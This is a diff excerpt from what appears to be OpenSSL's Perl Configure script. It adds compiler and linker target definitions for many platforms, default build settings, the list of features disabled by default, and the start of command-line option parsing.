+"beos-x86-r5",   "gcc:-DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -mcpu=pentium -Wall::-D_REENTRANT:BEOS:-lbe -lnet:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:beos:beos-shared:-fPIC -DPIC:-shared:.so",
+"beos-x86-bone", "gcc:-DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -mcpu=pentium -Wall::-D_REENTRANT:BEOS:-lbe -lbind -lsocket:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:beos:beos-shared:-fPIC:-shared:.so",
+
+#### SCO/Caldera targets.
+#
+# Originally we had like unixware-*, unixware-*-pentium, unixware-*-p6, etc.
+# Now we only have blended unixware-* as it's the only one used by ./config.
+# If you want to optimize for particular microarchitecture, bypass ./config
+# and './Configure unixware-7 -Kpentium_pro' or whatever appropriate.
+# Note that not all targets include assembler support. Mostly because of
+# lack of motivation to support out-of-date platforms with out-of-date
+# compiler drivers and assemblers. Tim Rice <tim@multitalents.net> has
+# patiently assisted to debug most of it.
+#
+# UnixWare 2.0x fails destest with -O.
+"unixware-2.0","cc:-DFILIO_H -DNO_STRINGS_H::-Kthread::-lsocket -lnsl -lresolv -lx:${x86_gcc_des} ${x86_gcc_opts}:::",
+"unixware-2.1","cc:-O -DFILIO_H::-Kthread::-lsocket -lnsl -lresolv -lx:${x86_gcc_des} ${x86_gcc_opts}:::",
+"unixware-7","cc:-O -DFILIO_H -Kalloca::-Kthread::-lsocket -lnsl:BN_LLONG MD2_CHAR RC4_INDEX ${x86_gcc_des}:${x86_elf_asm}-1:dlfcn:svr5-shared:-Kpic::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"unixware-7-gcc","gcc:-DL_ENDIAN -DFILIO_H -O3 -fomit-frame-pointer -march=pentium -Wall::-D_REENTRANT::-lsocket -lnsl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}-1:dlfcn:gnu-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+# SCO 5 - Ben Laurie <ben@algroup.co.uk> says the -O breaks the SCO cc.
+"sco5-cc",  "cc:-belf::(unknown)::-lsocket -lnsl:${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}-1:dlfcn:svr3-shared:-Kpic::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"sco5-gcc",  "gcc:-O3 -fomit-frame-pointer::(unknown)::-lsocket -lnsl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}-1:dlfcn:svr3-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+#### IBM's AIX.
+"aix3-cc",  "cc:-O -DB_ENDIAN -qmaxmem=16384::(unknown):AIX::BN_LLONG RC4_CHAR:::",
+"aix-gcc",  "gcc:-O -DB_ENDIAN::-pthread:AIX::BN_LLONG RC4_CHAR:${ppc32_asm}:aix32:dlfcn:aix-shared::-shared -Wl,-G:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)::-X32",
+"aix64-gcc","gcc:-maix64 -O -DB_ENDIAN::-pthread:AIX::SIXTY_FOUR_BIT_LONG RC4_CHAR:${ppc64_asm}:aix64:dlfcn:aix-shared::-maix64 -shared -Wl,-G:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)::-X64",
+# Below targets assume AIX 5. Idea is to effectively disregard $OBJECT_MODE
+# at build time. $OBJECT_MODE is respected at ./config stage!
+"aix-cc",   "cc:-q32 -O -DB_ENDIAN -qmaxmem=16384 -qro -qroconst::-qthreaded -D_THREAD_SAFE:AIX::BN_LLONG RC4_CHAR:${ppc32_asm}:aix32:dlfcn:aix-shared::-q32 -G:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)::-X 32",
+"aix64-cc", "cc:-q64 -O -DB_ENDIAN -qmaxmem=16384 -qro -qroconst::-qthreaded -D_THREAD_SAFE:AIX::SIXTY_FOUR_BIT_LONG RC4_CHAR:${ppc64_asm}:aix64:dlfcn:aix-shared::-q64 -G:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)::-X 64",
+
+#
+# Cray T90 and similar (SDSC)
+# It's Big-endian, but the algorithms work properly when B_ENDIAN is NOT
+# defined.  The T90 ints and longs are 8 bytes long, and apparently the
+# B_ENDIAN code assumes 4 byte ints.  Fortunately, the non-B_ENDIAN and
+# non L_ENDIAN code aligns the bytes in each word correctly.
+#
+# The BIT_FIELD_LIMITS define is to avoid two fatal compiler errors:
+#'Taking the address of a bit field is not allowed. '
+#'An expression with bit field exists as the operand of "sizeof" '
+# (written by Wayne Schroeder <schroede@SDSC.EDU>)
+#
+# j90 is considered the base machine type for unicos machines,
+# so this configuration is now called "cray-j90" ...
+"cray-j90", "cc: -DBIT_FIELD_LIMITS -DTERMIOS::(unknown):CRAY::SIXTY_FOUR_BIT_LONG DES_INT:::",
+
+#
+# Cray T3E (Research Center Juelich, beckman@acl.lanl.gov)
+#
+# The BIT_FIELD_LIMITS define was written for the C90 (it seems).  I added
+# another use.  Basically, the problem is that the T3E uses some bit fields
+# for some st_addr stuff, and then sizeof and address-of fails
+# I could not use the ams/alpha.o option because the Cray assembler, 'cam'
+# did not like it.
+"cray-t3e", "cc: -DBIT_FIELD_LIMITS -DTERMIOS::(unknown):CRAY::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT:::",
+
+# DGUX, 88100.
+"dgux-R3-gcc",	"gcc:-O3 -fomit-frame-pointer::(unknown):::RC4_INDEX DES_UNROLL:::",
+"dgux-R4-gcc",	"gcc:-O3 -fomit-frame-pointer::(unknown)::-lnsl -lsocket:RC4_INDEX DES_UNROLL:::",
+"dgux-R4-x86-gcc",	"gcc:-O3 -fomit-frame-pointer -DL_ENDIAN::(unknown)::-lnsl -lsocket:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}",
+
+# Sinix/ReliantUNIX RM400
+# NOTE: The CDS++ Compiler up to V2.0Bsomething has the IRIX_CC_BUG optimizer problem. Better use -g  */
+"ReliantUNIX","cc:-KPIC -g -DTERMIOS -DB_ENDIAN::-Kthread:SNI:-lsocket -lnsl -lc -L/usr/ucblib -lucb:BN_LLONG DES_PTR DES_RISC2 DES_UNROLL BF_PTR:${no_asm}:dlfcn:reliantunix-shared:::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"SINIX","cc:-O::(unknown):SNI:-lsocket -lnsl -lc -L/usr/ucblib -lucb:RC4_INDEX RC4_CHAR:::",
+"SINIX-N","/usr/ucb/cc:-O2 -misaligned::(unknown)::-lucb:RC4_INDEX RC4_CHAR:::",
+
+# SIEMENS BS2000/OSD: an EBCDIC-based mainframe
+"BS2000-OSD","c89:-O -XLLML -XLLMK -XL -DB_ENDIAN -DTERMIOS -DCHARSET_EBCDIC::(unknown)::-lsocket -lnsl:THIRTY_TWO_BIT DES_PTR DES_UNROLL MD2_CHAR RC4_INDEX RC4_CHAR BF_PTR:::",
+
+# OS/390 Unix an EBCDIC-based Unix system on IBM mainframe
+# You need to compile using the c89.sh wrapper in the tools directory, because the
+# IBM compiler does not like the -L switch after any object modules.
+#
+"OS390-Unix","c89.sh:-O -DB_ENDIAN -DCHARSET_EBCDIC -DNO_SYS_PARAM_H  -D_ALL_SOURCE::(unknown):::THIRTY_TWO_BIT DES_PTR DES_UNROLL MD2_CHAR RC4_INDEX RC4_CHAR BF_PTR:::",
+
+# Visual C targets
+#
+# Win64 targets, WIN64I denotes IA-64 and WIN64A - AMD64
+"VC-WIN64I","cl:-W3 -Gs0 -Gy -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DUNICODE -D_UNICODE -D_CRT_SECURE_NO_DEPRECATE:::WIN64I::SIXTY_FOUR_BIT RC4_CHUNK_LL DES_INT EXPORT_VAR_AS_FN:ia64cpuid.o:ia64.o ia64-mont.o:::aes_core.o aes_cbc.o aes-ia64.o::md5-ia64.o:sha1-ia64.o sha256-ia64.o sha512-ia64.o:::::::ghash-ia64.o::ias:win32",
+"VC-WIN64A","cl:-W3 -Gs0 -Gy -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DUNICODE -D_UNICODE -D_CRT_SECURE_NO_DEPRECATE:::WIN64A::SIXTY_FOUR_BIT RC4_CHUNK_LL DES_INT EXPORT_VAR_AS_FN:".eval{my $asm=$x86_64_asm;$asm=~s/x86_64-gcc\.o/bn_asm.o/;$asm}.":auto:win32",
+"debug-VC-WIN64I","cl:-W3 -Gs0 -Gy -Zi -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DUNICODE -D_UNICODE -D_CRT_SECURE_NO_DEPRECATE:::WIN64I::SIXTY_FOUR_BIT RC4_CHUNK_LL DES_INT EXPORT_VAR_AS_FN:ia64cpuid.o:ia64.o:::aes_core.o aes_cbc.o aes-ia64.o::md5-ia64.o:sha1-ia64.o sha256-ia64.o sha512-ia64.o:::::::ghash-ia64.o::ias:win32",
+"debug-VC-WIN64A","cl:-W3 -Gs0 -Gy -Zi -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DUNICODE -D_UNICODE -D_CRT_SECURE_NO_DEPRECATE:::WIN64A::SIXTY_FOUR_BIT RC4_CHUNK_LL DES_INT EXPORT_VAR_AS_FN:".eval{my $asm=$x86_64_asm;$asm=~s/x86_64-gcc\.o/bn_asm.o/;$asm}.":auto:win32",
+# x86 Win32 target defaults to ANSI API, if you want UNICODE, complement
+# 'perl Configure VC-WIN32' with '-DUNICODE -D_UNICODE'
+"VC-WIN32","cl:-W3 -Gs0 -GF -Gy -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -D_CRT_SECURE_NO_DEPRECATE:::WIN32::BN_LLONG RC4_INDEX EXPORT_VAR_AS_FN ${x86_gcc_opts}:${x86_asm}:win32n:win32",
+# Unified CE target
+"debug-VC-WIN32","cl:-W3 -Gs0 -GF -Gy -Zi -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -D_CRT_SECURE_NO_DEPRECATE:::WIN32::BN_LLONG RC4_INDEX EXPORT_VAR_AS_FN ${x86_gcc_opts}:${x86_asm}:win32n:win32",
+"VC-CE","cl::::WINCE::BN_LLONG RC4_INDEX EXPORT_VAR_AS_FN ${x86_gcc_opts}:${no_asm}:win32",
+
+# Borland C++ 4.5
+"BC-32","bcc32::::WIN32::BN_LLONG DES_PTR RC4_INDEX EXPORT_VAR_AS_FN:${no_asm}:win32",
+
+# MinGW
+"mingw", "gcc:-mno-cygwin -DL_ENDIAN -DWIN32_LEAN_AND_MEAN -fomit-frame-pointer -O3 -march=i486 -Wall::-D_MT:MINGW32:-lws2_32 -lgdi32 -lcrypt32:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts} EXPORT_VAR_AS_FN:${x86_asm}:coff:win32:cygwin-shared:-D_WINDLL -DOPENSSL_USE_APPLINK:-mno-cygwin:.dll.a",
+# As for OPENSSL_USE_APPLINK. Applink makes it possible to use .dll
+# compiled with one compiler with application compiled with another
+# compiler. It's possible to engage Applink support in mingw64 build,
+# but it's not done, because till mingw64 supports structured exception
+# handling, one can't seriously consider its binaries for using with
+# non-mingw64 run-time environment. And as mingw64 is always consistent
+# with itself, Applink is never engaged and can as well be omitted.
+"mingw64", "gcc:-mno-cygwin -DL_ENDIAN -O3 -Wall -DWIN32_LEAN_AND_MEAN -DUNICODE -D_UNICODE::-D_MT:MINGW64:-lws2_32 -lgdi32 -lcrypt32:SIXTY_FOUR_BIT RC4_CHUNK_LL DES_INT EXPORT_VAR_AS_FN:${x86_64_asm}:mingw64:win32:cygwin-shared:-D_WINDLL:-mno-cygwin:.dll.a",
+
+# UWIN 
+"UWIN", "cc:-DTERMIOS -DL_ENDIAN -O -Wall:::UWIN::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${no_asm}:win32",
+
+# Cygwin
+"Cygwin", "gcc:-DTERMIOS -DL_ENDIAN -fomit-frame-pointer -O3 -march=i486 -Wall:::CYGWIN::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_asm}:coff:dlfcn:cygwin-shared:-D_WINDLL:-shared:.dll.a",
+"Cygwin-x86_64", "gcc:-DTERMIOS -DL_ENDIAN -O3 -Wall:::CYGWIN::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:mingw64:dlfcn:cygwin-shared:-D_WINDLL:-shared:.dll.a",
+
+# NetWare from David Ward (dsward@novell.com)
+# requires either MetroWerks NLM development tools, or gcc / nlmconv
+# NetWare defaults socket bio to WinSock sockets. However,
+# the builds can be configured to use BSD sockets instead.
+# netware-clib => legacy CLib c-runtime support
+"netware-clib", "mwccnlm::::::${x86_gcc_opts}::",
+"netware-clib-bsdsock", "mwccnlm::::::${x86_gcc_opts}::",
+"netware-clib-gcc", "i586-netware-gcc:-nostdinc -I/ndk/nwsdk/include/nlm -I/ndk/ws295sdk/include -DL_ENDIAN -DNETWARE_CLIB -DOPENSSL_SYSNAME_NETWARE -O2 -Wall:::::${x86_gcc_opts}::",
+"netware-clib-bsdsock-gcc", "i586-netware-gcc:-nostdinc -I/ndk/nwsdk/include/nlm -DNETWARE_BSDSOCK -DNETDB_USE_INTERNET -DL_ENDIAN -DNETWARE_CLIB -DOPENSSL_SYSNAME_NETWARE -O2 -Wall:::::${x86_gcc_opts}::",
+# netware-libc => LibC/NKS support
+"netware-libc", "mwccnlm::::::BN_LLONG ${x86_gcc_opts}::",
+"netware-libc-bsdsock", "mwccnlm::::::BN_LLONG ${x86_gcc_opts}::",
+"netware-libc-gcc", "i586-netware-gcc:-nostdinc -I/ndk/libc/include -I/ndk/libc/include/winsock -DL_ENDIAN -DNETWARE_LIBC -DOPENSSL_SYSNAME_NETWARE -DTERMIOS -O2 -Wall:::::BN_LLONG ${x86_gcc_opts}::",
+"netware-libc-bsdsock-gcc", "i586-netware-gcc:-nostdinc -I/ndk/libc/include -DNETWARE_BSDSOCK -DL_ENDIAN -DNETWARE_LIBC -DOPENSSL_SYSNAME_NETWARE -DTERMIOS -O2 -Wall:::::BN_LLONG ${x86_gcc_opts}::",
+
+# DJGPP
+"DJGPP", "gcc:-I/dev/env/WATT_ROOT/inc -DTERMIOS -DL_ENDIAN -fomit-frame-pointer -O2 -Wall:::MSDOS:-L/dev/env/WATT_ROOT/lib -lwatt:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_asm}:a.out:",
+
+# Ultrix from Bernhard Simon <simon@zid.tuwien.ac.at>
+"ultrix-cc","cc:-std1 -O -Olimit 2500 -DL_ENDIAN::(unknown):::::::",
+"ultrix-gcc","gcc:-O3 -DL_ENDIAN::(unknown):::BN_LLONG::::",
+# K&R C is no longer supported; you need gcc on old Ultrix installations
+##"ultrix","cc:-O2 -DNOPROTO -DNOCONST -DL_ENDIAN::(unknown):::::::",
+
+##### MacOS X (a.k.a. Rhapsody or Darwin) setup
+"rhapsody-ppc-cc","cc:-O3 -DB_ENDIAN::(unknown):MACOSX_RHAPSODY::BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${no_asm}::",
+"darwin-ppc-cc","cc:-arch ppc -O3 -DB_ENDIAN -Wa,-force_cpusubtype_ALL::-D_REENTRANT:MACOSX:-Wl,-search_paths_first%:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${ppc32_asm}:osx32:dlfcn:darwin-shared:-fPIC -fno-common:-arch ppc -dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+"darwin64-ppc-cc","cc:-arch ppc64 -O3 -DB_ENDIAN::-D_REENTRANT:MACOSX:-Wl,-search_paths_first%:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${ppc64_asm}:osx64:dlfcn:darwin-shared:-fPIC -fno-common:-arch ppc64 -dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+"darwin-i386-cc","cc:-arch i386 -O3 -fomit-frame-pointer -DL_ENDIAN::-D_REENTRANT:MACOSX:-Wl,-search_paths_first%:BN_LLONG RC4_INT RC4_CHUNK DES_UNROLL BF_PTR:".eval{my $asm=$x86_asm;$asm=~s/cast\-586\.o//;$asm}.":macosx:dlfcn:darwin-shared:-fPIC -fno-common:-arch i386 -dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+"debug-darwin-i386-cc","cc:-arch i386 -g3 -DL_ENDIAN::-D_REENTRANT:MACOSX:-Wl,-search_paths_first%:BN_LLONG RC4_INT RC4_CHUNK DES_UNROLL BF_PTR:${x86_asm}:macosx:dlfcn:darwin-shared:-fPIC -fno-common:-arch i386 -dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+"darwin64-x86_64-cc","cc:-arch x86_64 -O3 -DL_ENDIAN -Wall::-D_REENTRANT:MACOSX:-Wl,-search_paths_first%:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:".eval{my $asm=$x86_64_asm;$asm=~s/rc4\-[^:]+//;$asm}.":macosx:dlfcn:darwin-shared:-fPIC -fno-common:-arch x86_64 -dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+"debug-darwin64-x86_64-cc","cc:-arch x86_64 -ggdb -g2 -O0 -DL_ENDIAN -Wall::-D_REENTRANT:MACOSX:-Wl,-search_paths_first%:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:".eval{my $asm=$x86_64_asm;$asm=~s/rc4\-[^:]+//;$asm}.":macosx:dlfcn:darwin-shared:-fPIC -fno-common:-arch x86_64 -dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+"debug-darwin-ppc-cc","cc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DCRYPTO_MDEBUG -DB_ENDIAN -g -Wall -O::-D_REENTRANT:MACOSX::BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${ppc32_asm}:osx32:dlfcn:darwin-shared:-fPIC:-dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+# iPhoneOS/iOS
+"iphoneos-cross","llvm-gcc:-O3 -isysroot \$(CROSS_TOP)/SDKs/\$(CROSS_SDK) -fomit-frame-pointer -fno-common::-D_REENTRANT:iOS:-Wl,-search_paths_first%:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${no_asm}:dlfcn:darwin-shared:-fPIC -fno-common:-dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+
+##### A/UX
+"aux3-gcc","gcc:-O2 -DTERMIOS::(unknown):AUX:-lbsd:RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:::",
+
+##### Sony NEWS-OS 4.x
+"newsos4-gcc","gcc:-O -DB_ENDIAN::(unknown):NEWS4:-lmld -liberty:BN_LLONG RC4_CHAR RC4_CHUNK DES_PTR DES_RISC1 DES_UNROLL BF_PTR::::",
+
+##### GNU Hurd
+"hurd-x86",  "gcc:-DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -march=i486 -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:-fPIC",
+
+##### OS/2 EMX
+"OS2-EMX", "gcc::::::::",
+
+##### VxWorks for various targets
+"vxworks-ppc60x","ccppc:-D_REENTRANT -mrtp -mhard-float -mstrict-align -fno-implicit-fp -DPPC32_fp60x -O2 -fstrength-reduce -fno-builtin -fno-strict-aliasing -Wall -DCPU=PPC32 -DTOOL_FAMILY=gnu -DTOOL=gnu -I\$(WIND_BASE)/target/usr/h -I\$(WIND_BASE)/target/usr/h/wrn/coreip:::VXWORKS:-Wl,--defsym,__wrs_rtp_base=0xe0000000 -L \$(WIND_BASE)/target/usr/lib/ppc/PPC32/common:::::",
+"vxworks-ppcgen","ccppc:-D_REENTRANT -mrtp -msoft-float -mstrict-align -O1 -fno-builtin -fno-strict-aliasing -Wall -DCPU=PPC32 -DTOOL_FAMILY=gnu -DTOOL=gnu -I\$(WIND_BASE)/target/usr/h -I\$(WIND_BASE)/target/usr/h/wrn/coreip:::VXWORKS:-Wl,--defsym,__wrs_rtp_base=0xe0000000 -L \$(WIND_BASE)/target/usr/lib/ppc/PPC32/sfcommon:::::",
+"vxworks-ppc405","ccppc:-g -msoft-float -mlongcall -DCPU=PPC405 -I\$(WIND_BASE)/target/h:::VXWORKS:-r:::::",
+"vxworks-ppc750","ccppc:-ansi -nostdinc -DPPC750 -D_REENTRANT -fvolatile -fno-builtin -fno-for-scope -fsigned-char -Wall -msoft-float -mlongcall -DCPU=PPC604 -I\$(WIND_BASE)/target/h \$(DEBUG_FLAG):::VXWORKS:-r:::::",
+"vxworks-ppc750-debug","ccppc:-ansi -nostdinc -DPPC750 -D_REENTRANT -fvolatile -fno-builtin -fno-for-scope -fsigned-char -Wall -msoft-float -mlongcall -DCPU=PPC604 -I\$(WIND_BASE)/target/h -DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DPEDANTIC -DDEBUG_SAFESTACK -DDEBUG -g:::VXWORKS:-r:::::",
+"vxworks-ppc860","ccppc:-nostdinc -msoft-float -DCPU=PPC860 -DNO_STRINGS_H -I\$(WIND_BASE)/target/h:::VXWORKS:-r:::::",
+"vxworks-simlinux","ccpentium:-B\$(WIND_BASE)/host/\$(WIND_HOST_TYPE)/lib/gcc-lib/ -D_VSB_CONFIG_FILE=\"\$(WIND_BASE)/target/lib/h/config/vsbConfig.h\" -DL_ENDIAN -DCPU=SIMLINUX -DTOOL_FAMILY=gnu -DTOOL=gnu -fno-builtin -fno-defer-pop -DNO_STRINGS_H -I\$(WIND_BASE)/target/h -I\$(WIND_BASE)/target/h/wrn/coreip -DOPENSSL_NO_HW_PADLOCK:::VXWORKS:-r::${no_asm}::::::ranlibpentium:",
+"vxworks-mips","ccmips:-mrtp -mips2 -O -G 0 -B\$(WIND_BASE)/host/\$(WIND_HOST_TYPE)/lib/gcc-lib/ -D_VSB_CONFIG_FILE=\"\$(WIND_BASE)/target/lib/h/config/vsbConfig.h\" -DCPU=MIPS32 -msoft-float -mno-branch-likely -DTOOL_FAMILY=gnu -DTOOL=gnu -fno-builtin -fno-defer-pop -DNO_STRINGS_H -I\$(WIND_BASE)/target/usr/h -I\$(WIND_BASE)/target/h/wrn/coreip::-D_REENTRANT:VXWORKS:-Wl,--defsym,__wrs_rtp_base=0xe0000000 -L \$(WIND_BASE)/target/usr/lib/mips/MIPSI32/sfcommon::${mips32_asm}:o32::::::ranlibmips:",
+
+##### Compaq Non-Stop Kernel (Tandem)
+"tandem-c89","c89:-Ww -D__TANDEM -D_XOPEN_SOURCE -D_XOPEN_SOURCE_EXTENDED=1 -D_TANDEM_SOURCE -DB_ENDIAN::(unknown):::THIRTY_TWO_BIT:::",
+
+# uClinux
+"uClinux-dist","$ENV{'CC'}:\$(CFLAGS)::-D_REENTRANT::\$(LDFLAGS) \$(LDLIBS):BN_LLONG:${no_asm}:$ENV{'LIBSSL_dlfcn'}:linux-shared:-fPIC:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):$ENV{'RANLIB'}::",
+"uClinux-dist64","$ENV{'CC'}:\$(CFLAGS)::-D_REENTRANT::\$(LDFLAGS) \$(LDLIBS):SIXTY_FOUR_BIT_LONG:${no_asm}:$ENV{'LIBSSL_dlfcn'}:linux-shared:-fPIC:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):$ENV{'RANLIB'}::",
+
+);
+
+my @MK1MF_Builds=qw(VC-WIN64I VC-WIN64A
+		    debug-VC-WIN64I debug-VC-WIN64A
+		    VC-NT VC-CE VC-WIN32 debug-VC-WIN32
+		    BC-32 
+		    netware-clib netware-clib-bsdsock
+		    netware-libc netware-libc-bsdsock);
+
+my $idx = 0;
+my $idx_cc = $idx++;
+my $idx_cflags = $idx++;
+my $idx_unistd = $idx++;
+my $idx_thread_cflag = $idx++;
+my $idx_sys_id = $idx++;
+my $idx_lflags = $idx++;
+my $idx_bn_ops = $idx++;
+my $idx_cpuid_obj = $idx++;
+my $idx_bn_obj = $idx++;
+my $idx_ec_obj = $idx++;
+my $idx_des_obj = $idx++;
+my $idx_aes_obj = $idx++;
+my $idx_bf_obj = $idx++;
+my $idx_md5_obj = $idx++;
+my $idx_sha1_obj = $idx++;
+my $idx_cast_obj = $idx++;
+my $idx_rc4_obj = $idx++;
+my $idx_rmd160_obj = $idx++;
+my $idx_rc5_obj = $idx++;
+my $idx_wp_obj = $idx++;
+my $idx_cmll_obj = $idx++;
+my $idx_modes_obj = $idx++;
+my $idx_engines_obj = $idx++;
+my $idx_perlasm_scheme = $idx++;
+my $idx_dso_scheme = $idx++;
+my $idx_shared_target = $idx++;
+my $idx_shared_cflag = $idx++;
+my $idx_shared_ldflag = $idx++;
+my $idx_shared_extension = $idx++;
+my $idx_ranlib = $idx++;
+my $idx_arflags = $idx++;
+my $idx_multilib = $idx++;
+
+my $prefix="";
+my $libdir="";
+my $openssldir="";
+my $exe_ext="";
+my $install_prefix= "$ENV{'INSTALL_PREFIX'}";
+my $cross_compile_prefix="";
+my $fipsdir="/usr/local/ssl/fips-2.0";
+my $fipslibdir="";
+my $baseaddr="0xFB00000";
+my $no_threads=0;
+my $threads=0;
+my $no_shared=0; # but "no-shared" is default
+my $zlib=1;      # but "no-zlib" is default
+my $no_krb5=0;   # but "no-krb5" is implied unless "--with-krb5-..." is used
+my $no_rfc3779=1; # but "no-rfc3779" is default
+my $no_asm=0;
+my $no_dso=0;
+my $no_gmp=0;
+my @skip=();
+my $Makefile="Makefile";
+my $des_locl="crypto/des/des_locl.h";
+my $des	="crypto/des/des.h";
+my $bn	="crypto/bn/bn.h";
+my $md2	="crypto/md2/md2.h";
+my $rc4	="crypto/rc4/rc4.h";
+my $rc4_locl="crypto/rc4/rc4_locl.h";
+my $idea	="crypto/idea/idea.h";
+my $rc2	="crypto/rc2/rc2.h";
+my $bf	="crypto/bf/bf_locl.h";
+my $bn_asm	="bn_asm.o";
+my $des_enc="des_enc.o fcrypt_b.o";
+my $aes_enc="aes_core.o aes_cbc.o";
+my $bf_enc	="bf_enc.o";
+my $cast_enc="c_enc.o";
+my $rc4_enc="rc4_enc.o rc4_skey.o";
+my $rc5_enc="rc5_enc.o";
+my $md5_obj="";
+my $sha1_obj="";
+my $rmd160_obj="";
+my $cmll_enc="camellia.o cmll_misc.o cmll_cbc.o";
+my $processor="";
+my $default_ranlib;
+my $perl;
+my $fips=0;
+
+if (exists $ENV{FIPSDIR})
+	{
+	$fipsdir = $ENV{FIPSDIR};
+	$fipsdir =~ s/\/$//;
+	}
+
+# All of the following is disabled by default (RC5 was enabled before 0.9.8):
+
+my %disabled = ( # "what"         => "comment" [or special keyword "experimental"]
+		 "ec_nistp_64_gcc_128" => "default",
+		 "gmp"		  => "default",
+		 "jpake"          => "experimental",
+		 "libunbound"     => "experimental",
+		 "md2"            => "default",
+		 "rc5"            => "default",
+		 "rfc3779"	  => "default",
+		 "sctp"       => "default",
+		 "shared"         => "default",
+		 "ssl-trace"	  => "default",
+		 "store"	  => "experimental",
+		 "unit-test"	  => "default",
+		 "zlib"           => "default",
+		 "zlib-dynamic"   => "default"
+	       );
+my @experimental = ();
+
+# This is what $depflags will look like with the above defaults
+# (we need this to see if we should advise the user to run "make depend"):
+my $default_depflags = " -DOPENSSL_NO_EC_NISTP_64_GCC_128 -DOPENSSL_NO_GMP -DOPENSSL_NO_JPAKE -DOPENSSL_NO_LIBUNBOUND -DOPENSSL_NO_MD2 -DOPENSSL_NO_RC5 -DOPENSSL_NO_RFC3779 -DOPENSSL_NO_SCTP -DOPENSSL_NO_SSL_TRACE -DOPENSSL_NO_STORE -DOPENSSL_NO_UNIT_TEST";
+
+# Explicit "no-..." options will be collected in %disabled along with the defaults.
+# To remove something from %disabled, use "enable-foo" (unless it's experimental).
+# For symmetry, "disable-foo" is a synonym for "no-foo".
+
+# For features called "experimental" here, a more explicit "experimental-foo" is needed to enable.
+# We will collect such requests in @experimental.
+# To avoid accidental use of experimental features, applications will have to use -DOPENSSL_EXPERIMENTAL_FOO.
+
+
+my $no_sse2=0;
+
+&usage if ($#ARGV < 0);
+
+my $flags;
+my $depflags;
+my $openssl_experimental_defines;
+my $openssl_algorithm_defines;
+my $openssl_thread_defines;
+my $openssl_sys_defines="";
+my $openssl_other_defines;
+my $libs;
+my $libkrb5="";
+my $target;
+my $options;
+my $symlink;
+my $make_depend=0;
+my %withargs=();
+
+my @argvcopy=@ARGV;
+my $argvstring="";
+my $argv_unprocessed=1;
+
+while($argv_unprocessed)
+	{
+	$flags="";
+	$depflags="";
+	$openssl_experimental_defines="";
+	$openssl_algorithm_defines="";
+	$openssl_thread_defines="";
+	$openssl_sys_defines="";
+	$openssl_other_defines="";
+	$libs="";
+	$target="";
+	$options="";
+	$symlink=1;
+
+	$argv_unprocessed=0;
+	$argvstring=join(' ',@argvcopy);
+
+PROCESS_ARGS:
+	foreach (@argvcopy)
+		{
+		s /^-no-/no-/; # some people just can't read the instructions
+
+		# rewrite some options in "enable-..." form
+		s /^-?-?shared$/enable-shared/;
